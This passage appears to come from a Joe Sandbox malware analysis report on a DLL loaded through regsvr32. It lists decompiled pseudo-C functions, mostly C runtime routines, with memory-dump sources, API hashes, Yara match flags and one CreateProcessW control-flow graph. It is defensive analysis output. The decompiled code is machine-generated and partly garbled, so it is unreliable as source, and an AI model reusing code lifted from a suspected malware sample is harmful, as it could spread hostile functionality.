				if ( *((intOrPtr*)(_t84 + 8)) != _t85) goto 0x800102ff;
				 *0x8005ea4c = 0;
				_a16 = _t85;
				 *0x8005ea50 = _t84;
				E0000000118002E8A0(_t84 + 8, _t85 + 1);
				_a16 = _t85;
				E0000000118002E8A0(_t84 + 8, _t68);
				return _t36;
			}
















                                                                                                    0x1800101cc
                                                                                                    0x1800101cc
                                                                                                    0x1800101df
                                                                                                    0x1800101e2
                                                                                                    0x1800101e8
                                                                                                    0x1800101ea
                                                                                                    0x1800101f4
                                                                                                    0x1800101f6
                                                                                                    0x1800101fb
                                                                                                    0x180010200
                                                                                                    0x18001020c
                                                                                                    0x180010217
                                                                                                    0x18001021d
                                                                                                    0x180010226
                                                                                                    0x180010230
                                                                                                    0x180010235
                                                                                                    0x18001023a
                                                                                                    0x18001023e
                                                                                                    0x180010246
                                                                                                    0x18001024b
                                                                                                    0x18001024e
                                                                                                    0x180010257
                                                                                                    0x180010260
                                                                                                    0x18001026d
                                                                                                    0x180010272
                                                                                                    0x180010278
                                                                                                    0x18001027a
                                                                                                    0x18001027f
                                                                                                    0x180010282
                                                                                                    0x180010286
                                                                                                    0x18001029d
                                                                                                    0x1800102a2
                                                                                                    0x1800102ab
                                                                                                    0x1800102b0
                                                                                                    0x1800102b2
                                                                                                    0x1800102b9
                                                                                                    0x1800102bf
                                                                                                    0x1800102c5
                                                                                                    0x1800102cc
                                                                                                    0x1800102d5
                                                                                                    0x1800102db
                                                                                                    0x1800102e3
                                                                                                    0x1800102e7
                                                                                                    0x1800102ee
                                                                                                    0x1800102f0
                                                                                                    0x1800102fd
                                                                                                    0x180010309
                                                                                                    0x18001030b
                                                                                                    0x180010313
                                                                                                    0x180010317
                                                                                                    0x18001031e
                                                                                                    0x180010326
                                                                                                    0x18001032a
                                                                                                    0x180010341

                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileModuleName_invalid_parameter_noinfo
                                                                                                    • String ID: C:\Windows\system32\regsvr32.exe
                                                                                                    • API String ID: 3307058713-464481000
                                                                                                    • Opcode ID: 7be1cc30620430b547016d9389939d0bdae56661f55019a9cb6154dc9bee402a
                                                                                                    • Instruction ID: 7199bbec45a6b509d3cf51927076fe08a69271b9a8b54862cab20cfe2b18fb70
                                                                                                    • Opcode Fuzzy Hash: 7be1cc30620430b547016d9389939d0bdae56661f55019a9cb6154dc9bee402a
                                                                                                    • Instruction Fuzzy Hash: 17418E32200A9886EB97DF25A4413ED77A4F74EBC4F54C426FD8A47B85DE79C6498300
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 000000018002C4D0 Relevance: 3.8, APIs: 3, Instructions: 46COMMONLIBRARYCODE
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    C-Code - Quality: 65%
                                                                                                    			E0000000118002C4D0(void* __rax, long long __rbx, long long __rsi, long long _a8, long long _a16) {
				void* _t6;
				void* _t11;
				intOrPtr _t13;
				intOrPtr _t16;
				void* _t27;
				void* _t31;
				void* _t33;
				void* _t36;

				_t29 = __rbx;
				_t27 = __rax;
				_a8 = __rbx;
				_a16 = __rsi;
				GetLastError();
				_t13 =  *0x8005d050; // 0xffffffff
				if (_t13 == 0xffffffff) goto 0x8002c501;
				_t6 = E0000000118002D43C(_t13, _t13 - 0xffffffff, __rax, __rbx, _t31);
				if (__rax != 0) goto 0x8002c542;
				E0000000118002E7AC(_t6, _t31, _t33); // executed
				_t36 = _t27;
				if (_t27 != 0) goto 0x8002c521;
				E0000000118002E8A0(_t27, _t31);
				goto 0x8002c547;
				_t16 =  *0x8005d050; // 0xffffffff
				if (E0000000118002D494(_t16, _t27, _t27, _t29, _t31, _t27, __rsi) == 0) goto 0x8002c51a;
				E0000000118002BF58(_t36, _t27);
				_t11 = E0000000118002E8A0(_t27, _t36);
				if (_t36 != 0) goto 0x8002c551;
				SetLastError(??);
				goto 0x8002c55c;
				SetLastError(??);
				return _t11;
			}











                                                                                                    0x18002c4d0
                                                                                                    0x18002c4d0
                                                                                                    0x18002c4d0
                                                                                                    0x18002c4d5
                                                                                                    0x18002c4df
                                                                                                    0x18002c4e5
                                                                                                    0x18002c4f2
                                                                                                    0x18002c4f4
                                                                                                    0x18002c4ff
                                                                                                    0x18002c50b
                                                                                                    0x18002c510
                                                                                                    0x18002c516
                                                                                                    0x18002c51a
                                                                                                    0x18002c51f
                                                                                                    0x18002c521
                                                                                                    0x18002c534
                                                                                                    0x18002c536
                                                                                                    0x18002c53d
                                                                                                    0x18002c545
                                                                                                    0x18002c549
                                                                                                    0x18002c54f
                                                                                                    0x18002c553
                                                                                                    0x18002c56e

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast
                                                                                                    • String ID:
                                                                                                    • API String ID: 1452528299-0
                                                                                                    • Opcode ID: 42fa0f4c9c27a1c3e2d7020b8c78320f9d0165bb7ab61cca920a0d8c342bd814
                                                                                                    • Instruction ID: 28f93db68e944e4e34e01601293cda7601e20eb7f0a91c6b766d5687f81f5d63
                                                                                                    • Opcode Fuzzy Hash: 42fa0f4c9c27a1c3e2d7020b8c78320f9d0165bb7ab61cca920a0d8c342bd814
                                                                                                    • Instruction Fuzzy Hash: C111C430300A5C42FAEB6725A8547EE2351AB4C7C0F44C425FD0E07BD6DE28EB8D8705
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 02603A34 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 109processCOMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 494 2603a34-2603aeb call 2614df4 497 2603af1-2603b6d call 2627f00 494->497 498 2603b73-2603bbd CreateProcessW 494->498 497->498
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.373894564.0000000002601000.00000020.00001000.00020000.00000000.sdmp, Offset: 02601000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_2601000_regsvr32.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CreateProcess
                                                                                                    • String ID: +
                                                                                                    • API String ID: 963392458-2626494186
                                                                                                    • Opcode ID: 47add7ba1b746a2be91a3e12d6c01e2e8a6866b8be632bc30d09dc2a65525946
                                                                                                    • Instruction ID: 8a941789d7f79f871f713b273c9d63795a7477bfb0ccec3c7959b5a9002331e4
                                                                                                    • Opcode Fuzzy Hash: 47add7ba1b746a2be91a3e12d6c01e2e8a6866b8be632bc30d09dc2a65525946
                                                                                                    • Instruction Fuzzy Hash: CF412B7091CB848FDB78DF18D08979AB7E0FB98315F10095EE49DC7296DB749884CB86
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0000000180001390 Relevance: 3.0, APIs: 2, Instructions: 23COMMON
                                                                                                    Download Yara Rule

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 501 180001390-1800013b9 call 180001d88 call 180003614 506 1800013bb-1800013bd 501->506 507 1800013bf call 18001178c 501->507 508 1800013d3-1800013d8 506->508 510 1800013c4-1800013c6 507->510 511 1800013d1 510->511 512 1800013c8-1800013cf call 180003670 510->512 511->508 512->506
                                                                                                    C-Code - Quality: 68%
                                                                                                    			E00000001180001390(void* __ecx) {
				void* __rbx;
				void* _t12;
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t20;

				_t2 =  ==  ? 1 :  *0x8005db70 & 0x000000ff;
				 *0x8005db70 =  ==  ? 1 :  *0x8005db70 & 0x000000ff;
				E00000001180001D88(1, _t12, __ecx, _t17, _t18, _t19, _t20);
				if (E00000001180003614() != 0) goto 0x800013bf;
				goto 0x800013d3; // executed
				E0000000118001178C(_t17); // executed
				if (0 != 0) goto 0x800013d1;
				E00000001180003670(0);
				goto 0x800013bb;
				return 1;
			}









                                                                                                    0x1800013a4
                                                                                                    0x1800013a7
                                                                                                    0x1800013ad
                                                                                                    0x1800013b9
                                                                                                    0x1800013bd
                                                                                                    0x1800013bf
                                                                                                    0x1800013c6
                                                                                                    0x1800013ca
                                                                                                    0x1800013cf
                                                                                                    0x1800013d8

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: __vcrt_initialize__vcrt_initialize_locks__vcrt_initialize_winapi_thunks__vcrt_uninitialize
                                                                                                    • String ID:
                                                                                                    • API String ID: 1882725809-0
                                                                                                    • Opcode ID: c94d98d4d28900cdc0b56b6e125ca62062fc729effd45dde081f28d7ea927dd0
                                                                                                    • Instruction ID: 2a09a8dc2cc2ae50554edf296dd3a59d657fb110ca1a11c915c3197892f6a4ff
                                                                                                    • Opcode Fuzzy Hash: c94d98d4d28900cdc0b56b6e125ca62062fc729effd45dde081f28d7ea927dd0
                                                                                                    • Instruction Fuzzy Hash: 8AE04F7020914CDAFEE7A67224923F932641B5D3C2F44D05BB891532C38E0A478E2735
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0000000180039978 Relevance: 1.6, APIs: 1, Instructions: 51COMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 71%
                                                                                                    			E00000001180039978(void* __ecx, void* __edx, long long __rax, signed int __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, void* __rbp, void* __r9, long long _a8, long long _a16, long long _a24) {
				long long _v24;
				void* _t18;
				intOrPtr _t21;
				intOrPtr _t23;
				intOrPtr _t24;
				void* _t32;
				long long _t39;
				signed long long _t45;

				_t39 = __rax;
				_a8 = __rbx;
				_a16 = __rsi;
				_a24 = __rdi;
				_t32 = __ecx;
				if ((0 | __ecx - 0x00002000 > 0x00000000) != 0) goto 0x800399b5;
				_t18 = E0000000118002E69C(__rax);
				 *((intOrPtr*)(__rax)) = 9;
				E0000000118002E4F0(_t18);
				goto 0x80039a19;
				E0000000118002C628();
				_t45 = __rbx;
				_v24 = __rbx;
				_t21 =  *0x8005ee90; // 0x40
				if (_t32 - _t21 < 0) goto 0x80039a0d;
				if ( *((intOrPtr*)(0x8005ea90 + __rbx * 8)) == __rbx) goto 0x800399e1;
				goto 0x80039a03; // executed
				E00000001180039890( *((intOrPtr*)(0x8005ea90 + __rbx * 8)) - __rbx, __rax, __rbx, __rcx, __rdx, __rsi, __rbp, __r9); // executed
				 *((long long*)(0x8005ea90 + _t45 * 8)) = _t39;
				if (_t39 != 0) goto 0x800399f4;
				goto 0x80039a0d;
				_t23 =  *0x8005ee90; // 0x40
				_t24 = _t23 + 0x40;
				 *0x8005ee90 = _t24;
				_v24 = _t45 + 1;
				goto 0x800399ce;
				E0000000118002C67C();
				goto 0x800399b1;
				return _t24;
			}











                                                                                                    0x180039978
                                                                                                    0x180039978
                                                                                                    0x18003997d
                                                                                                    0x180039982
                                                                                                    0x18003998d
                                                                                                    0x18003999e
                                                                                                    0x1800399a0
                                                                                                    0x1800399aa
                                                                                                    0x1800399ac
                                                                                                    0x1800399b3
                                                                                                    0x1800399ba
                                                                                                    0x1800399c0
                                                                                                    0x1800399c3
                                                                                                    0x1800399c8
                                                                                                    0x1800399d0
                                                                                                    0x1800399dd
                                                                                                    0x1800399df
                                                                                                    0x1800399e1
                                                                                                    0x1800399e6
                                                                                                    0x1800399ed
                                                                                                    0x1800399f2
                                                                                                    0x1800399f4
                                                                                                    0x1800399fa
                                                                                                    0x1800399fd
                                                                                                    0x180039a06
                                                                                                    0x180039a0b
                                                                                                    0x180039a12
                                                                                                    0x180039a17
                                                                                                    0x180039a2e

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: _invalid_parameter_noinfo
                                                                                                    • String ID:
                                                                                                    • API String ID: 3215553584-0
                                                                                                    • Opcode ID: f3b4df4ece23d376e1106641c76f044c44cc1549dc76ad20db8cef6412acd12a
                                                                                                    • Instruction ID: bd6bc2cbcf442e3530aecd92894d426c52f69f7bc890ac8c535bb043548204b9
                                                                                                    • Opcode Fuzzy Hash: f3b4df4ece23d376e1106641c76f044c44cc1549dc76ad20db8cef6412acd12a
                                                                                                    • Instruction Fuzzy Hash: C611913211A788C6F3A39F94E4417DA77A5F74D3C0F46852AFA8987796DF38CA088741
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 000000018002E7AC Relevance: 1.5, APIs: 1, Instructions: 36memoryCOMMONLIBRARYCODE
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 37%
                                                                                                    			E0000000118002E7AC(void* __eax, signed int __rcx, signed int __rdx) {
				void* __rbx;
				intOrPtr* _t22;
				signed int _t29;

				_t29 = __rdx;
				if (__rcx == 0) goto 0x8002e7cb;
				_t1 = _t29 - 0x20; // -32
				_t22 = _t1;
				if (_t22 - __rdx < 0) goto 0x8002e80e;
				_t25 =  ==  ? _t22 : __rcx * __rdx;
				goto 0x8002e7f2;
				if (E000000011800384BC() == 0) goto 0x8002e80e;
				if (E00000001180031A08(_t22,  ==  ? _t22 : __rcx * __rdx,  ==  ? _t22 : __rcx * __rdx) == 0) goto 0x8002e80e;
				RtlAllocateHeap(??, ??, ??); // executed
				if (_t22 == 0) goto 0x8002e7dd;
				goto 0x8002e81b;
				E0000000118002E69C(_t22);
				 *_t22 = 0xc;
				return 0;
			}






                                                                                                    0x18002e7ac
                                                                                                    0x18002e7bb
                                                                                                    0x18002e7bf
                                                                                                    0x18002e7bf
                                                                                                    0x18002e7c9
                                                                                                    0x18002e7d7
                                                                                                    0x18002e7db
                                                                                                    0x18002e7e4
                                                                                                    0x18002e7f0
                                                                                                    0x18002e801
                                                                                                    0x18002e80a
                                                                                                    0x18002e80c
                                                                                                    0x18002e80e
                                                                                                    0x18002e813
                                                                                                    0x18002e820

                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AllocateHeap
                                                                                                    • String ID:
                                                                                                    • API String ID: 1279760036-0
                                                                                                    • Opcode ID: a5ff80dc029cc2159c7fe0d9a6a43b3143568d9995edaeb7881dd3ccf32093ea
                                                                                                    • Instruction ID: 4aca16e423dbe421e26c2b8b925da822ac11fb5d3b0d9994f386edf9fe61c951
                                                                                                    • Opcode Fuzzy Hash: a5ff80dc029cc2159c7fe0d9a6a43b3143568d9995edaeb7881dd3ccf32093ea
                                                                                                    • Instruction Fuzzy Hash: 3EF0907134568C81FED7576699553D613851B9EBC0F0CC434B94E86BC2DE2CC68C4310
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Non-executed Functions

                                                                                                    Function 000000018003D0E0 Relevance: 39.8, APIs: 18, Strings: 4, Instructions: 1310COMMONLIBRARYCODECrypto
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 58%
                                                                                                    			E0000000118003D0E0(signed int __ecx, signed int __edx, signed long long __rcx, signed int* __r8, signed int __r9, signed int __r10, signed long long __r11) {
				void* __rbx;
				void* __rsi;
				void* _t529;
				void* _t547;
				void* _t555;
				void* _t587;
				signed long long _t592;
				intOrPtr _t599;
				void* _t606;
				void* _t623;
				signed int _t630;
				signed long long _t635;
				intOrPtr _t642;
				void* _t649;
				void* _t666;
				signed int _t673;
				void* _t684;
				void* _t703;
				signed int _t704;
				signed int _t705;
				intOrPtr _t710;
				signed long long _t714;
				signed int _t719;
				signed char _t720;
				signed long long _t744;
				signed int _t757;
				intOrPtr _t767;
				signed int _t768;
				signed long long _t774;
				signed long long _t780;
				signed long long _t785;
				intOrPtr _t810;
				signed long long _t823;
				void* _t825;
				signed long long _t838;
				void* _t839;
				intOrPtr _t844;
				signed int _t857;
				signed int _t859;
				signed int _t860;
				void* _t865;
				void* _t871;
				void* _t905;
				void* _t911;
				signed long long _t1033;
				signed long long _t1043;
				void* _t1045;
				signed long long _t1047;
				signed long long _t1048;
				signed long long _t1053;
				signed long long _t1054;
				signed long long _t1055;
				signed long long _t1058;
				void* _t1065;
				intOrPtr* _t1066;
				signed long long _t1072;
				void* _t1074;
				signed long long _t1082;
				signed long long _t1086;
				signed long long _t1087;
				signed long long _t1096;
				signed long long _t1100;
				void* _t1112;
				signed long long _t1121;
				signed long long _t1122;
				void* _t1123;
				signed long long _t1129;
				long long _t1144;
				signed long long _t1154;
				void* _t1155;
				signed long long _t1160;
				void* _t1162;
				signed long long _t1163;
				signed long long _t1164;
				char* _t1168;
				void* _t1169;
				void* _t1170;
				signed long long _t1171;
				signed long long _t1176;
				signed long long _t1178;
				signed long long _t1187;
				signed long long _t1190;
				signed long long _t1191;
				signed long long _t1200;
				signed long long _t1203;
				signed long long _t1204;
				signed long long _t1217;
				signed long long _t1225;
				signed long long _t1227;
				signed long long _t1228;
				unsigned long long _t1239;

				_t1228 = __r11;
				_t1222 = __r9;
				_t1169 = _t1170 - 0x6d8;
				_t1171 = _t1170 - 0x7d8;
				_t1033 =  *0x8005d010; // 0xb03f6156e10
				 *(_t1169 + 0x6c0) = _t1033 ^ _t1171;
				 *(_t1171 + 0x38) = __rcx;
				 *((long long*)(_t1171 + 0x50)) = __r9;
				 *((long long*)(_t1171 + 0x70)) = __r8;
				E00000001180042DF4(_t1171 + 0x60);
				r13d = 0;
				if (( *(_t1171 + 0x60) & 0x0000001f) != 0x1f) goto 0x8003d143;
				 *((intOrPtr*)(_t1171 + 0x68)) = r13b;
				goto 0x8003d152;
				E00000001180042E60(( *(_t1171 + 0x60) & 0x0000001f) - 0x1f, _t1171 + 0x60);
				 *((char*)(_t1171 + 0x68)) = 1;
				_t1047 =  *(_t1171 + 0x38);
				__r8[2] = __r9;
				asm("sbb ecx, ecx");
				_t719 = (__ecx & 0x0000000d) + 0x20;
				 *__r8 = _t719;
				if ((0x00000000 & _t1047) != 0) goto 0x8003d1c2;
				if ((0xffffffff & _t1047) != 0) goto 0x8003d1c2;
				__r8[1] = r13d;
				if (E00000001180011A20(0, __r9,  *((intOrPtr*)(_t1169 + 0x740)), 0x800513ac) == 0) goto 0x8003e3ae;
				goto 0x8003e3e2;
				_t19 = _t1171 + 0x38; // 0x10000000000037
				_t1072 = _t19;
				_t529 = E00000001180034E00(_t1072);
				_t865 = _t529;
				if (_t865 == 0) goto 0x8003d1d8;
				__r8[1] = 1;
				if (_t865 == 0) goto 0x8003e390;
				if (_t865 == 0) goto 0x8003e371;
				if (_t865 == 0) goto 0x8003e352;
				if (_t529 - 0xffffffffffffffff == 1) goto 0x8003e333;
				r9d = 0x7ff;
				_t1048 = _t1047 & 0xffffffff;
				 *(_t1171 + 0x38) = _t1048;
				asm("movsd xmm0, [esp+0x38]");
				asm("movsd [esp+0x58], xmm0");
				_t1121 =  *((intOrPtr*)(_t1171 + 0x58));
				 *((intOrPtr*)(_t1171 + 0x4c)) = __edx + 1;
				_t1176 = _t1121 >> 0x34;
				_t720 = _t719 & 0xffffff00 | (__r9 & _t1176) == 0x00000000;
				asm("dec ebp");
				_t1122 = _t1121 & 0xffffffff;
				asm("sbb eax, eax");
				r8d = r8d & r9d;
				_t703 = _t1176 - 0x434 +  ~( ~_t720) + 1;
				0x80042f80();
				E00000001180042EB0( ~( ~_t720) + 1, _t1176);
				asm("cvttsd2si ecx, xmm0");
				 *(_t1169 - 0x7c) = r14d;
				r10d = 1;
				asm("inc ebp");
				_t1239 = ( !__r9 & 0x00000000) + _t1122 >> 0x20;
				r12d = r12d &  ~_t720;
				 *(_t1169 - 0x78) = r14d;
				 *(_t1171 + 0x30) = r12d;
				asm("sbb edx, edx");
				_t774 =  ~__edx + r10d;
				 *(_t1169 - 0x80) = _t774;
				if (_t703 < 0) goto 0x8003d55f;
				 *(_t1169 + 0x328) = 0x100000;
				 *((intOrPtr*)(_t1169 + 0x324)) = 0;
				 *(_t1169 + 0x320) = 0x10000000000002;
				if (_t774 != 0x10000000000002) goto 0x8003d43a;
				r8d = r13d;
				if ( *((intOrPtr*)(_t1169 + 0x324 + _t1072 * 4)) !=  *((intOrPtr*)(_t1169 + _t1072 * 4 - 0x7c))) goto 0x8003d43a;
				r8d = r8d + r10d;
				_t871 = r8d - 0x10000000000002;
				if (_t871 != 0) goto 0x8003d2dc;
				r11d = _t1048 + 2;
				 *(_t1171 + 0x38) = r13d;
				r9d = r11d;
				r11d = r11d & 0x0000001f;
				r9d = r9d >> 5;
				_t704 = _t703 - r10d;
				asm("inc ecx");
				r12d = _t704;
				r12d =  !r12d;
				if (_t871 == 0) goto 0x8003d32c;
				goto 0x8003d32f;
				_t547 = __r9 + 2;
				r15b = r11d - 0x20 - r13d > 0;
				r8b = _t547 - 0x73 > 0;
				if (_t547 != 0x73) goto 0x8003d350;
				if (r15b != 0) goto 0x8003d353;
				r13d = r13d | 0xffffffff;
				if (r8b != 0) goto 0x8003d401;
				if (r13b != 0) goto 0x8003d401;
				r14d = 0x72;
				r14d =  <  ? _t547 : r14d;
				if (r14d == r13d) goto 0x8003d3d6;
				r8d = r14d;
				r8d = r8d - r9d;
				_t823 = _t1176 + __r9;
				if (_t823 - r9d < 0) goto 0x8003d3d0;
				if (r8d - _t774 >= 0) goto 0x8003d395;
				r10d =  *(_t1169 + _t1176 * 4 - 0x7c);
				goto 0x8003d398;
				r10d = 0;
				if (_t1176 - 1 - _t774 >= 0) goto 0x8003d3a6;
				goto 0x8003d3a8;
				r8d = r8d + r13d;
				r10d = r10d & _t704;
				r10d = r10d << r11d;
				 *(_t1169 + _t1160 * 4 - 0x7c) = (0 & r12d) >> 0x00000020 | r10d;
				if (_t1176 + __r9 == r13d) goto 0x8003d3d0;
				_t780 =  *(_t1169 - 0x80);
				goto 0x8003d380;
				r10d = 1;
				r13d = 0;
				if (r9d == 0) goto 0x8003d3f0;
				 *(_t1169 + 0x3fffffffffff84) = r13d;
				if (r13d + r10d != r9d) goto 0x8003d3e1;
				r14d =  !=  ? _t1239 + 1 : r14d;
				 *(_t1169 - 0x80) = r14d;
				goto 0x8003d40b;
				r13d = 0;
				r14d = r13d;
				 *(_t1169 - 0x80) = r13d;
				 *((intOrPtr*)(_t1169 + 0x154)) = 4;
				r12d =  *(_t1171 + 0x30);
				r15d = 1;
				 *(_t1169 + 0x150) = r15d;
				 *(_t1169 + 0x320) = r15d;
				 *(_t1169 + 0x328) = r13d;
				goto 0x8003d7ae;
				 *(_t1171 + 0x38) =  *(_t1171 + 0x38) & 0x00000000;
				r11d = (__r10 << 0x20) + 1;
				r9d = r11d;
				r11d = r11d & 0x0000001f;
				r9d = r9d >> 5;
				r15d = _t823;
				r15d = r15d - r11d;
				_t705 = _t704 - r10d;
				asm("bsr eax, [ebp+eax*4-0x7c]");
				r13d = _t705;
				r13d =  !r13d;
				if (r15b == 0) goto 0x8003d476;
				goto 0x8003d478;
				_t555 = _t1122 + __r9;
				r12b = r11d - _t823 > 0;
				r8b = _t555 - 0x73 > 0;
				if (_t555 != 0x73) goto 0x8003d49b;
				if (r12b == 0) goto 0x8003d49b;
				goto 0x8003d49d;
				r10d = r10d | 0xffffffff;
				if (r8b != 0) goto 0x8003d54a;
				if (0 != 0) goto 0x8003d54a;
				r14d = 0x72;
				r14d =  <  ? _t555 : r14d;
				if (r14d == r10d) goto 0x8003d520;
				r8d = r14d;
				r8d = r8d - r9d;
				_t825 = _t1176 + __r9;
				if (_t825 - r9d < 0) goto 0x8003d520;
				if (r8d - _t780 >= 0) goto 0x8003d4df;
				r10d =  *(_t1169 + _t1176 * 4 - 0x7c);
				goto 0x8003d4e2;
				r10d = 0;
				if (_t1176 - 1 - _t780 >= 0) goto 0x8003d4f0;
				goto 0x8003d4f2;
				r10d = r10d & _t705;
				r10d = r10d << 0;
				r10d = r10d | (0 & r13d) >> 0;
				 *(_t1169 + _t1160 * 4 - 0x7c) = r10d;
				r10d = r10d | 0xffffffff;
				r8d = r8d + r10d;
				if (_t1176 + __r9 == r10d) goto 0x8003d520;
				_t785 =  *(_t1169 - 0x80);
				goto 0x8003d4ca;
				r13d = 0;
				if (r9d == 0) goto 0x8003d539;
				 *(_t1169 + 0x3fffffffffff84) = r13d;
				if (r13d + 1 != r9d) goto 0x8003d52b;
				r14d =  !=  ? _t1239 + 1 : r14d;
				 *(_t1169 - 0x80) = r14d;
				goto 0x8003d554;
				r13d = 0;
				r14d = r13d;
				 *(_t1169 - 0x80) = r13d;
				 *((intOrPtr*)(_t1169 + 0x154)) = 0x20 - r11d;
				goto 0x8003d415;
				if (_t705 == 0xfffffc02) goto 0x8003d697;
				 *(_t1169 + 0x328) = 0x100000;
				 *((intOrPtr*)(_t1169 + 0x324)) = 0;
				 *(_t1169 + 0x320) = 0x10000000000002;
				if (_t785 != 0x10000000000002) goto 0x8003d697;
				r8d = r13d;
				if ( *((intOrPtr*)(_t1169 + 0x324 + _t1072 * 4)) !=  *((intOrPtr*)(_t1169 + _t1072 * 4 - 0x7c))) goto 0x8003d697;
				r8d = r8d + r10d;
				_t905 = r8d - 0x10000000000002;
				if (_t905 != 0) goto 0x8003d591;
				asm("inc ecx");
				 *(_t1171 + 0x38) = r13d;
				if (_t905 == 0) goto 0x8003d5bc;
				goto 0x8003d5bf;
				r9b = _t825 - r13d - 0x10000000000002 > 0;
				r13d = r13d | 0xffffffff;
				if (0x10000000000002 - _t785 >= 0) goto 0x8003d5da;
				r8d =  *(_t1169 + 0x3fffffffffff84);
				goto 0x8003d5dd;
				r8d = 0;
				_t110 = _t1072 - 1; // 0x1
				if (_t110 - _t785 >= 0) goto 0x8003d5ea;
				goto 0x8003d5ec;
				 *(_t1169 + 0x3fffffffffff84) = 0 >> 0x0000001e ^ r8d << 0x00000002;
				if (0x10000000000002 + r13d == r13d) goto 0x8003d60a;
				goto 0x8003d5cd;
				r9b =  ~r9b;
				asm("inc ebp");
				r14d =  ~r14d;
				r14d = r14d + 0x10000000000002;
				 *(_t1169 - 0x80) = r14d;
				_t1053 = __r10 << r15d << 2;
